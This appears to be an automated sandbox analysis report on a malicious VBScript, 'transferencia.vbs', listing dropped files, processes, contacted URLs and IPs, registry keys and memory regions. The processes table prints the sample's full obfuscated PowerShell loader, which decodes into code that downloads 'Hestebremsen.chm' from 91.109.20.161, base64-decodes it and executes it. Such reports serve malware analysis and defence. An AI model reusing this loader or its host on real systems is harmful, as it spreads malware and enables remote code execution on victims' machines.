Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
transferencia.vbs
|
ASCII text, with very long lines (360), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xlpl1eip.t5n.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z2wew4ow.aev.psm1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\transferencia.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Patee Rutsjebaners Pumaernes Charless Topnoteringernes Centimeter
#>;$Gyrectomies='Bogman';<#Preremoving monotoni afdelingslgerne Blunderers Fingredes Intwists #>;$Limpid=$host.PrivateData;If
($Limpid) {$Navicert++;}function Opbrugets52($Craftsmaster){$Postnarisnhaust=$Hellenist+$Craftsmaster.Length-$Navicert;for(
$Postnaris=4;$Postnaris -lt $Postnarisnhaust;$Postnaris+=5){$Samfundslrers='nonfecund';$Informativ+=$Craftsmaster[$Postnaris];}$Informativ;}function
ggepuncherne($Unpopulousness27){ & ($Topographometric) ($Unpopulousness27);}$Postnarisnertion254=Opbrugets52 'TimeMDe
eo M kzVulciStillsoc l C aa Hvs/G,or5Hazi.Skak0Skun Grip(AkadWA lei C.nnUdbedOveroPreswBoilsBekj KabeNAntiTCoss Klud1Paul0,ash.
Bar0Dest;A te SoftWLigniDytinEpid6.orl4Soda;P.oc VidxCer,6Sona4 nde;Unle Ra.r .rov,idg:Radi1 Med2 Moc1Brss. hon0Mode)F ey
SporGMrkve FircMettkChito Tan/ Bl 2Cong0For,1 amm0Hymn0Insp1Skib0Mot,1Ring beblFFkaliHoldrLysbe.errfPicropeerxFrys/M sk1ce
t2Unco1Lat . rdi0 Uds ';$billardkugle=Opbrugets52 'Mi rU TalSForhE.linrSelv- egraPediG P aeO.lyns,ggtBete ';$Ugenummer=Opbrugets52
' An hChubt SertS umpOp,a:Bhmn/ mpe/So.s9Shit1Svas.Bobi1Nv i0Supe9 Sus.Maae2Chlo0 F s.Unde1 Egn6W ve1 Gud/FopdHPuere teas
Grit B.teG orbInter jore ilamjordsAvioe DoknD,ta.CentcStonh UdfmHage ';$onymize=Opbrugets52 'Plat>Awap ';$Topographometric=Opbrugets52
'BangIMa mE skuxKalk ';$nonhallucinatory='Selsparks';$Garwin='\Dorgens.Uns';ggepuncherne (Opbrugets52 'bitm$VkstgHootlsyreoInc
bK ffaCompl fas:RelaISkrinpreddSerek PetoOecapAntei IndeModirsclei Disn J mg hor=Ivin$ kaseStolnE.duv.err:Gol aSub.pAlvep
PredIdena NostDa,sabesp+Unem$sandGTetaaForertr swSwaniLbernCest ');ggepuncherne (Opbrugets52 ' kyl$MolygIllulBetvoOri bSkina
SkulOver: jerSSproaSapolO toa ecim rliaAn nnHermdskytr StiiRestnUtt eunre= T.e$.cheUFor g oneCasqnCarou,amlm ModmS.aceBrevrHo
s. ompsEvalpFinnlSk.niHudktMagn(Ac,c$ TrioStkinBundy kytm UneiIn.oz Un,eGad )Armi ');ggepuncherne (Opbrugets52 'Kate[OpvuNFrfreCowstSank.EjakS
BejeLicerRefivforhiinf.cBreaeA,stP .peoHabii AllnTr vtJermMHa,daTrevn fllaUtengPreaeSl,tr rdt]traw: Ci.: AsySPolleEliac aleucyrtrO,dniLet,tTel,yPersPDirrr
Nono C.st.unoo Pr,cKeepoCadrlJudo Hamm=Atta Un.r[ DiaNcop eIndftMile.MammSColoeStuccMentusolbrBog,i Altt rmayAnglPContr udio
attt BefoAspacArchoFredlTriaTBragyd rnpti.geM ck] rer:Rej :MuniT Taml BolsKamf1Noci2I.fl ');$Ugenummer=$Salamandrine[0];$Hexactinellid40=(Opbrugets52
'Le a$,ircGTanol jesoSperBCondA Skrlbela:CupoGOrigrGtebuuntiiHemoN onseKor =Poc,NHaece H.mWB.it-cnidOMirabultrjBaroETracCOxaltF,st
s nssW.rsyNe,tsByghtMy,ieRubem s c.WaitN.uldeVaret rni.Fa iwBiseeForbbForecAub LveteISu.ee C nN BavT Dec ');ggepuncherne ($Hexactinellid40);ggepuncherne
(Opbrugets52 ' S,n$FloaGBe orIntruhawkiZ.opnKonfeGirl.MohaH IsoePseuaMudcdRetseQ.adrArris inn[ Por$Fo dbFr siuklalcomplOut,a
xcer .ond utukCharuPilegKos.lTo.ve.nto]Frek=,pfa$BitsPVibroLutessquatUbemnKalpa TerrAntiiFde,s Marn chieD gtrF.shtGeraiAnatoO.twnFr
k2Komp5se i4 M l ');$Appartementerne=Opbrugets52 'Fdev$IndhG StorBedruUnliiFl,rn andeEpip.PaalDBengoSeiswPiannG unlskruoTo
oaGlu,dlittF rii dsslRecaeStri(Mas $Inf USnevg dlneswamnpromu erdmUnstm S,jeNederdiss,Smir$EsteH andeJohaaTestdUnr wTravaPy
al Va,lanaps ko ) O i ';$Headwalls=$Indkopiering;ggepuncherne (Opbrugets52 'kate$Dag,G araLEkseOGr.nBglacAF.rbLarbi:D nsSUndeANohoNMeteEsa.trBasiiBiffNRandGStums
.hapCou L AceAAandnSkriSLike=Nons(OverT Pr eBesvs emotDd a-Fa.sper oaPrecTUn eh,ota Supp$Ud kh PloEEtheA Unidtragw unkAGypplGenfLNav
sDann)Fecu ');while (!$Saneringsplans) {ggepuncherne (Opbrugets52 'Sati$ProcgMothlTyveo Preb ,usaHnislOdou:A orSR alopri,rEvo.t
DehbEndorInt s Usmgsp cr CoroDisms S esPac.e ndrAngeeMetrrReineP,einhira=Snif$My lt JonrSammuE tue No, ') ;ggepuncherne $Appartementerne;ggepuncherne
(Opbrugets52 'CuncSFrdstUdvialovbr.avtt S.i-BekoSPolylNonie UdleNapopArve Ribi4Kemi ');ggepuncherne (Opbrugets52 'a ro$MispgModslPlano
dseb rka Bufl li: .ntSchina SagnSnapeGelar FreiSlgenKassgSides Filp verlTranaDok,n Slas Gla= S,a( FaaT.itueT ess olet lop-PantPb
siaTorstPrush F k Pede$D,ffHSacce DisaAnild S,iwSl,vaAntilInfelPainsIm.r)Unlo ') ;ggepuncherne (Opbrugets52 ' Oc $MoelgdknilmarroUnpob
BaraIn,llHark:StadIcymonRverd AntbBenvyshe.gBry nDowniSy,snKri,g v nsUnsakC ula,nclsTracs DupeRail=Form$ kilg Jorl epoo GenbTan
aTromlPent:BeklORebsp laybFlledTaale ProsS at+Prsi+ Rus%Psyc$G afS Ko aJibblC.emaSvanmForna inn TriduncarAarvi Be nF lle
La . recBonhoTel uK ntn.inet Con ') ;$Ugenummer=$Salamandrine[$Indbygningskasse];}$Vertikalernes=278564;$Binokular=29796;ggepuncherne
(Opbrugets52 'Tung$Lkkeg SimlK tkoEnt b AdhaDis lRoni:VemoA.appbEnkesDybvt acrSan,uGasosOpkaiAntioUvrdnSkot T.l= at SkilG
trae TrotRigs-OverCSp aoStadnWorktS.mmeOf in A tt Or. Ubev$ AfsHOcl.e s aaGhendEs awe spaRec lPer lKrtesA.at ');ggepuncherne
(Opbrugets52 'Ind $AlkygTr clHopio DesbAlfaaM milXene:SexaPKrlir sl,oloantC leo KnarItattStonhTop,oMgl pToa.tLatee.yperd siaDisl
Par = ebu Evan[Rer,S locyDeodsP rytUn ee Do.m ume.subiCInveo YaknRensvPendedeborAf mtPara]Rest:P,ak: WhiFUnrerOtheoBa,omToneBDes
aJun sA emeDe,e6u pr4 retSSkoltBrisrKrokiChapnNe tgLan (Klft$ ,piATaulbStoks R.mt s vrTryku EqusPas iAktioHyponUfat) K a ');ggepuncherne
(Opbrugets52 'Mine$ungrgArbelWelso Makb Ro apibelCont: ucuJFyrseUng.sKoras Pr.iJudicRin,aMiso Sag.=G ff Swoo[snotSSl.syGenks
NontPreleCon,m Sp,. homTUltreSydhxDelrtTall.RadiE Astn nducUretoStdtdu jliSamdnSalggArge] Ra :Amus:FornAConuSSoulCGlggIAfhaITiss.TanyGNonreTj
etUnc SEnketG eerKvkkiSermnsupegKami( Iow$MiliPpreir CafoUn htI dso DrirKapitCodhhSammoundepAdsttGryne VrarIsola Tea)S,ri
');ggepuncherne (Opbrugets52 'Fors$Fi agK lkl H.loPlebb UnsaOmr lMo.e:MameU ParnSletitalanBelljExtruRe srInt,iUdtao D.nuUnfes
Bol=Torm$AsymJZeu eFinlsUkams Z.ai Sevc SupaMame. GstsVse.uPeppbtkkesZephtAmenrArali DsrnMet g Per(Mark$Ma.aVA oueD,asr ertVandi
SeakArbeaUsdel F re T,krLegansc teV risTil ,Fr,e$g.ntBMajoi Fonn WoooParakDannuChlolReina,lasrGrs )Geot ');ggepuncherne $Uninjurious;"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://91.109.20.161/Hestebremsen.chm
|
91.109.20.161
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://91.109.20.161
|
unknown
|
||
|
http://91.109.20.161(
|
unknown
|
||
|
http://91.109.20.161/Hestebremsen.chmP
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 5 hidden URLs, click here to show them.
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
91.109.20.161
|
unknown
|
Germany
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
6139C83000
|
stack
|
page read and write
|
||
|
1BF18F1D000
|
heap
|
page read and write
|
||
|
2129284C000
|
heap
|
page read and write
|
||
|
1BF32E29000
|
heap
|
page read and write
|
||
|
1BF32DC9000
|
heap
|
page read and write
|
||
|
2129485C000
|
heap
|
page read and write
|
||
|
21292620000
|
heap
|
page read and write
|
||
|
1BF1A8E0000
|
heap
|
page read and write
|
||
|
1BF1A8A0000
|
heap
|
page readonly
|
||
|
7FF848C93000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BF18EC0000
|
trusted library section
|
page read and write
|
||
|
7FF848F70000
|
trusted library allocation
|
page read and write
|
||
|
1BF1CA44000
|
trusted library allocation
|
page read and write
|
||
|
1BF2AA90000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E90000
|
trusted library allocation
|
page read and write
|
||
|
212947E0000
|
heap
|
page read and write
|
||
|
1BF330E0000
|
heap
|
page execute and read and write
|
||
|
1BF1A960000
|
heap
|
page read and write
|
||
|
21294846000
|
heap
|
page read and write
|
||
|
7FF848C92000
|
trusted library allocation
|
page read and write
|
||
|
2129486F000
|
heap
|
page read and write
|
||
|
21294533000
|
heap
|
page read and write
|
||
|
1BF1C278000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
|
2129485A000
|
heap
|
page read and write
|
||
|
7FF848EB0000
|
trusted library allocation
|
page read and write
|
||
|
1BF18F5D000
|
heap
|
page read and write
|
||
|
613A27E000
|
stack
|
page read and write
|
||
|
1BF33100000
|
trusted library allocation
|
page read and write
|
||
|
1BF33154000
|
heap
|
page read and write
|
||
|
1BF18EF3000
|
heap
|
page read and write
|
||
|
1BF1AA70000
|
heap
|
page execute and read and write
|
||
|
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
|
2129488F000
|
heap
|
page read and write
|
||
|
21292700000
|
heap
|
page read and write
|
||
|
212928CB000
|
heap
|
page read and write
|
||
|
7FF848CA0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F10000
|
trusted library allocation
|
page read and write
|
||
|
212928C8000
|
heap
|
page read and write
|
||
|
1BF1A923000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D46000
|
trusted library allocation
|
page read and write
|
||
|
212928CB000
|
heap
|
page read and write
|
||
|
613B24E000
|
stack
|
page read and write
|
||
|
21294821000
|
heap
|
page read and write
|
||
|
21294523000
|
heap
|
page read and write
|
||
|
1BF3314D000
|
heap
|
page read and write
|
||
|
2129280F000
|
heap
|
page read and write
|
||
|
1BF1B878000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FE0000
|
trusted library allocation
|
page read and write
|
||
|
212944C2000
|
heap
|
page read and write
|
||
|
613A17C000
|
stack
|
page read and write
|
||
|
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
|
2129485C000
|
heap
|
page read and write
|
||
|
7FF848F30000
|
trusted library allocation
|
page read and write
|
||
|
73EDBFB000
|
stack
|
page read and write
|
||
|
73ED8FD000
|
stack
|
page read and write
|
||
|
1BF18E30000
|
heap
|
page read and write
|
||
|
613A57D000
|
stack
|
page read and write
|
||
|
212929C0000
|
heap
|
page read and write
|
||
|
1BF1C6D3000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E50000
|
trusted library allocation
|
page execute and read and write
|
||
|
212944D9000
|
heap
|
page read and write
|
||
|
1BF2AC33000
|
trusted library allocation
|
page read and write
|
||
|
1BF1A8D0000
|
heap
|
page execute and read and write
|
||
|
2129488F000
|
heap
|
page read and write
|
||
|
212948CE000
|
heap
|
page read and write
|
||
|
2129488F000
|
heap
|
page read and write
|
||
|
1BF18F66000
|
heap
|
page read and write
|
||
|
7FF848EE0000
|
trusted library allocation
|
page read and write
|
||
|
212944C5000
|
heap
|
page read and write
|
||
|
6139DCE000
|
stack
|
page read and write
|
||
|
2129487F000
|
heap
|
page read and write
|
||
|
1BF18F34000
|
heap
|
page read and write
|
||
|
1BF33103000
|
trusted library allocation
|
page read and write
|
||
|
1BF18F14000
|
heap
|
page read and write
|
||
|
1BF32DD1000
|
heap
|
page read and write
|
||
|
1BF2AD6B000
|
trusted library allocation
|
page read and write
|
||
|
212948C6000
|
heap
|
page read and write
|
||
|
1BF18E85000
|
heap
|
page read and write
|
||
|
7FF848ED0000
|
trusted library allocation
|
page read and write
|
||
|
613A67E000
|
stack
|
page read and write
|
||
|
613A5FE000
|
stack
|
page read and write
|
||
|
21294861000
|
heap
|
page read and write
|
||
|
613A2FE000
|
stack
|
page read and write
|
||
|
7FF848F50000
|
trusted library allocation
|
page read and write
|
||
|
212948DC000
|
heap
|
page read and write
|
||
|
2129450F000
|
heap
|
page read and write
|
||
|
73EDAFF000
|
stack
|
page read and write
|
||
|
212927D7000
|
heap
|
page read and write
|
||
|
1BF18EB7000
|
heap
|
page read and write
|
||
|
2129487F000
|
heap
|
page read and write
|
||
|
212927FC000
|
heap
|
page read and write
|
||
|
212944C8000
|
heap
|
page read and write
|
||
|
21292800000
|
heap
|
page read and write
|
||
|
212928CB000
|
heap
|
page read and write
|
||
|
7DF431960000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BF18F6C000
|
heap
|
page read and write
|
||
|
21292720000
|
heap
|
page read and write
|
||
|
7FF849000000
|
trusted library allocation
|
page read and write
|
||
|
1BF32DC0000
|
heap
|
page read and write
|
||
|
2129287B000
|
heap
|
page read and write
|
||
|
7FF848E60000
|
trusted library allocation
|
page execute and read and write
|
||
|
212945E0000
|
heap
|
page read and write
|
||
|
1BF33183000
|
heap
|
page read and write
|
||
|
1BF33000000
|
heap
|
page read and write
|
||
|
613A378000
|
stack
|
page read and write
|
||
|
212929D5000
|
heap
|
page read and write
|
||
|
613B1CD000
|
stack
|
page read and write
|
||
|
2129487F000
|
heap
|
page read and write
|
||
|
21294866000
|
heap
|
page read and write
|
||
|
7FF848D40000
|
trusted library allocation
|
page read and write
|
||
|
21294849000
|
heap
|
page read and write
|
||
|
21294543000
|
heap
|
page read and write
|
||
|
212928C6000
|
heap
|
page read and write
|
||
|
1BF1ACB1000
|
trusted library allocation
|
page read and write
|
||
|
2129485F000
|
heap
|
page read and write
|
||
|
1BF3316A000
|
heap
|
page read and write
|
||
|
7FF848F00000
|
trusted library allocation
|
page read and write
|
||
|
1BF18E40000
|
heap
|
page read and write
|
||
|
1BF1C6FD000
|
trusted library allocation
|
page read and write
|
||
|
2129486D000
|
heap
|
page read and write
|
||
|
73ED9FE000
|
stack
|
page read and write
|
||
|
1BF18F5F000
|
heap
|
page read and write
|
||
|
613A6FE000
|
stack
|
page read and write
|
||
|
1BF1AE74000
|
trusted library allocation
|
page read and write
|
||
|
212944CA000
|
heap
|
page read and write
|
||
|
1BF33110000
|
heap
|
page read and write
|
||
|
2129450F000
|
heap
|
page read and write
|
||
|
613A77B000
|
stack
|
page read and write
|
||
|
212927FF000
|
heap
|
page read and write
|
||
|
7FF848E4A000
|
trusted library allocation
|
page read and write
|
||
|
212928C6000
|
heap
|
page read and write
|
||
|
21294621000
|
heap
|
page read and write
|
||
|
2129451B000
|
heap
|
page read and write
|
||
|
212927D0000
|
heap
|
page read and write
|
||
|
212948A7000
|
heap
|
page read and write
|
||
|
2129484F000
|
heap
|
page read and write
|
||
|
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
|
1BF18F68000
|
heap
|
page read and write
|
||
|
2129489E000
|
heap
|
page read and write
|
||
|
73ED5FE000
|
stack
|
page read and write
|
||
|
212927FB000
|
heap
|
page read and write
|
||
|
7FF848FD0000
|
trusted library allocation
|
page read and write
|
||
|
1BF1A8D7000
|
heap
|
page execute and read and write
|
||
|
1BF1AA81000
|
trusted library allocation
|
page read and write
|
||
|
1BF33118000
|
heap
|
page read and write
|
||
|
1BF2AA81000
|
trusted library allocation
|
page read and write
|
||
|
1BF1C6DB000
|
trusted library allocation
|
page read and write
|
||
|
7FF848CEC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BF1C6EB000
|
trusted library allocation
|
page read and write
|
||
|
212928C6000
|
heap
|
page read and write
|
||
|
212944CB000
|
heap
|
page read and write
|
||
|
1BF1C628000
|
trusted library allocation
|
page read and write
|
||
|
1BF18F17000
|
heap
|
page read and write
|
||
|
21294880000
|
heap
|
page read and write
|
||
|
21294862000
|
heap
|
page read and write
|
||
|
1BF1A920000
|
trusted library allocation
|
page read and write
|
||
|
21294AA0000
|
heap
|
page read and write
|
||
|
1BF1AE78000
|
trusted library allocation
|
page read and write
|
||
|
613A3F6000
|
stack
|
page read and write
|
||
|
7FF848F20000
|
trusted library allocation
|
page read and write
|
||
|
21294868000
|
heap
|
page read and write
|
||
|
21292800000
|
heap
|
page read and write
|
||
|
7FF848C94000
|
trusted library allocation
|
page read and write
|
||
|
2129489E000
|
heap
|
page read and write
|
||
|
1BF18E60000
|
heap
|
page read and write
|
||
|
2129485F000
|
heap
|
page read and write
|
||
|
21294842000
|
heap
|
page read and write
|
||
|
1BF1A890000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EF0000
|
trusted library allocation
|
page read and write
|
||
|
212944C1000
|
heap
|
page read and write
|
||
|
7FF848FC0000
|
trusted library allocation
|
page read and write
|
||
|
613B14E000
|
stack
|
page read and write
|
||
|
73ECF3A000
|
stack
|
page read and write
|
||
|
1BF1AB09000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F40000
|
trusted library allocation
|
page read and write
|
||
|
613B0FA000
|
stack
|
page read and write
|
||
|
73ED2FE000
|
stack
|
page read and write
|
||
|
7FF848FF0000
|
trusted library allocation
|
page read and write
|
||
|
1BF33003000
|
heap
|
page read and write
|
||
|
1BF33193000
|
heap
|
page read and write
|
||
|
212944D4000
|
heap
|
page read and write
|
||
|
2129489E000
|
heap
|
page read and write
|
||
|
2129484D000
|
heap
|
page read and write
|
||
|
212948A5000
|
heap
|
page read and write
|
||
|
7FF848D76000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848CB0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E80000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BF32E94000
|
heap
|
page read and write
|
||
|
1BF18F25000
|
heap
|
page read and write
|
||
|
212928C6000
|
heap
|
page read and write
|
||
|
1BF2AAF1000
|
trusted library allocation
|
page read and write
|
||
|
2129487F000
|
heap
|
page read and write
|
||
|
212944C8000
|
heap
|
page read and write
|
||
|
21294882000
|
heap
|
page read and write
|
||
|
1BF18E80000
|
heap
|
page read and write
|
||
|
21294513000
|
heap
|
page read and write
|
||
|
1BF1A870000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F60000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F80000
|
trusted library allocation
|
page read and write
|
||
|
212944D4000
|
heap
|
page read and write
|
||
|
1BF1A840000
|
heap
|
page read and write
|
||
|
1BF1C8F2000
|
trusted library allocation
|
page read and write
|
||
|
212944C8000
|
heap
|
page read and write
|
||
|
1BF18EB5000
|
heap
|
page read and write
|
||
|
2129485D000
|
heap
|
page read and write
|
||
|
1BF1A8B0000
|
trusted library allocation
|
page read and write
|
||
|
21294AA1000
|
heap
|
page read and write
|
||
|
2129488F000
|
heap
|
page read and write
|
||
|
7FF848CAB000
|
trusted library allocation
|
page read and write
|
||
|
1BF1A860000
|
trusted library section
|
page read and write
|
||
|
212944C0000
|
heap
|
page read and write
|
||
|
212944C2000
|
heap
|
page read and write
|
||
|
212929D0000
|
heap
|
page read and write
|
||
|
73ED3FE000
|
stack
|
page read and write
|
||
|
21294564000
|
heap
|
page read and write
|
||
|
73ED6FF000
|
stack
|
page read and write
|
||
|
1BF18ED0000
|
heap
|
page read and write
|
||
|
1BF33470000
|
heap
|
page read and write
|
||
|
7FF848E41000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F90000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D50000
|
trusted library allocation
|
page execute and read and write
|
||
|
613A0FE000
|
stack
|
page read and write
|
||
|
1BF18EB0000
|
heap
|
page read and write
|
||
|
2129283E000
|
heap
|
page read and write
|
||
|
7FF848E72000
|
trusted library allocation
|
page read and write
|
||
|
2129489E000
|
heap
|
page read and write
|
||
|
7FF848C9D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848FA0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D4C000
|
trusted library allocation
|
page execute and read and write
|
There are 221 hidden memdumps, click here to show them.